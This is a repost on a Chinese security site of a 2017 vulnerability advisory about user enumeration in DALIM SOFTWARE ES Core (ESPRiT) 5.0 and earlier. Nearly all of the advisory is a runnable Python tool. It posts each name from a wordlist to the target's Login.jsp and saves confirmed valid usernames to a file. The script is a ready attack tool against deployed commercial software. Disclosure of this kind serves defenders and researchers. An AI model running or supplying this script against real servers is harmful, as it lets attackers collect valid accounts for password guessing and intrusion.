首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DALIM SOFTWARE ES Core 5.0 Build 7184.1 User Enumeration
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2017-08-11  
#!/usr/bin/env python
#
#
# DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness
#
#
# Vendor: Dalim Software GmbH
# Product web page: https://www.dalim.com
# Affected version: ES/ESPRiT 5.0 (build 7184.1)
#                                 (build 7163.2)
#                                 (build 7163.0)
#                                 (build 7135.0)
#                                 (build 7114.1)
#                                 (build 7114.0)
#                                 (build 7093.1)
#                                 (build 7093.0)
#                                 (build 7072.0)
#                                 (build 7051.3)
#                                 (build 7051.1)
#                                 (build 7030.0)
#                                 (build 7009.0)
#                                 (build 6347.0)
#                                 (build 6326.0)
#                                 (build 6305.1)
#                                 (build 6235.9)
#                                 (build 6172.1)
#                   ES/ESPRiT 4.5 (build 6326.0)
#                                 (build 6144.2)
#                                 (build 5180.2)
#                                 (build 5096.0)
#                                 (build 4314.3)
#                                 (build 4314.0)
#                                 (build 4146.4)
#                                 (build 3308.3)
#                   ES/ESPRiT 4.0 (build 4202.0)
#                                 (build 4132.1)
#                                 (build 2235.0)
#                   ES/ESPRiT 3.0
#
# Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
# Core is the engine that can handle project tracking, JDF device workflow,
# dynamic user interface building, volume management. Each ES installation
# will have different features, depending on the license installed: online
# approval, prepress workflow, project tracking, imposition management...
#
# ES is a collaborative digital asset production and management platform,
# offering services ranging from online approval to web-based production
# environment for all participants of the production cycle, including brand
# owners, agencies, publishers, pre-media, printers and multichannel service
# provider. ES lets users plan, execute and control any aspect of media
# production, regardless of the final use of the output (print, web, ebook,
# movie, and others). It ensures productivity and longterm profitability.
#
# Desc: The weakness is caused due to the 'Login.jsp' script enumerating
# the list of valid usernames when some characters are provided via the
# 'login' parameter.
#
# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
#            CentOS 7
#            Apache Tomcat/7.0.78
#            Apache Tomcat/7.0.67
#            Apache Tomcat/7.0.42
#            Apache Tomcat/6.0.35
#            Apache-Coyote/1.1
#            Java/1.7.0_80
#            Java/1.6.0_21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5425
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
#
#
# 15.06.2017
#


import argparse
import requests
import sys

from colorama import Fore, Back, Style, init

init()

print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')

args = parser.parse_args()
if len(sys.argv) != 5:
	parser.print_help()
	sys.exit()

host = args.target
fn = args.file

try:
	users = open(args.file, 'r')
except(IOError):
	print '[!] Error opening \'' +fn+ '\' file.'
	sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
results = open('validusers.txt', 'w')

for line in lines:
	try:
		r = requests.post("http://" +host+ "/Esprit/public/Login.jsp", data={'actionRole' : 'getRoles', 'login' : line})
		print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
		testingus = r.text[50:72]
		if testingus[19:20] != "\"":
			print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
			results.write('%s\n' % line)
	except:
		print '[!] Error connecting to http://'+host
		sys.exit()

results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Microsoft Edge textarea.defaul
·Synology Photo Station 6.7.3-3
·Microsoft Windows 7 SP1 x86 -
·Microsoft Windows - LNK Shortc
·DNSTracer 1.9 - Buffer Overflo
·SMBLoris Denial Of Service
·Hashicorp vagrant-vmware-fusio
·Solarwinds Kiwi Syslog 9.6.1.6
·Nitro Pro PDF Reader 11.0.3.17
·Microsoft Windows LNK Shortcut
·Advantech SUSIAccess <= 3.0 -
·Advantech SUSIAccess <= 3.0 -
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved